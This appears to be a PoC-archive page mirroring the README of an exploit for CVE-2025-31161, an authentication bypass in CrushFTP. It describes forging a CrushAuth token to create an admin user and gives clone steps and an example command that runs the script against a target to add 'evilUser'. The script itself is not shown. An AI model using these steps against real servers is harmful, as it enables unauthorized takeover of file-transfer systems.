关联漏洞
Description
PoC CVE-2025-31161 - Authentication Bypass CrushFTP
介绍
# CVE-2025-31161 - CrushFTP Authentication Bypass Exploit
> PoC CVE-2025-31161 - Authentication Bypass CrushFTP
---
## 📌 CVE Details
- **ID**: CVE-2025-31161
- **Type**: Authentication Bypass
- **Vendor**: CrushFTP
- **Impact**: Allows unauthenticated attackers to forge a valid `CrushAuth` token and create a fully privileged admin user.
- **More Info**: [NVD Entry (when available)](https://nvd.nist.gov/vuln/detail/CVE-2025-31161)
---
## ⚙️ Description
This exploit targets a critical vulnerability in **CrushFTP**, allowing remote unauthenticated attackers to **bypass authentication** and **create arbitrary admin users**.
It works by crafting a valid-looking `CrushAuth` token and abusing the `/WebInterface/function/` endpoint to submit a fully-formed XML payload.
---
## 🚀 Usage
### 🔧 Requirements
- `curl`
- `shuf`
### Instalation
```bash
git clone https://github.com/f4dee-backup/CVE-2025-31161
```
```bash
cd CVE-2025-31161
```
```bash
chmod +x CVE-2025-31161.sh
```
### Help Panel:
```
./CVE-2025-31161.sh --help
[?] Parameters description:
--url Target base URL (e.g., http://target)
--port Port where CrushFTP is running
--target-user Valid or invalid username (e.g., crushadmin)
--new-user Username to be created (e.g., Pwn3d)
--new-password Password for the new user
--help Show this help panel
[i] Example: bash ./cve_official.sh --url http://target.com --port 80 --target-user crushadmin --new-user evilUser --new-password pass12345
```
文件快照
[4.0K] /data/pocs/28d6aae82e7dadd9b3698506b086317d30e9f506
├── [6.7K] CVE-2025-31161.sh
├── [1.0K] LICENSE
├── [1.5K] README.md
└── [ 30] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。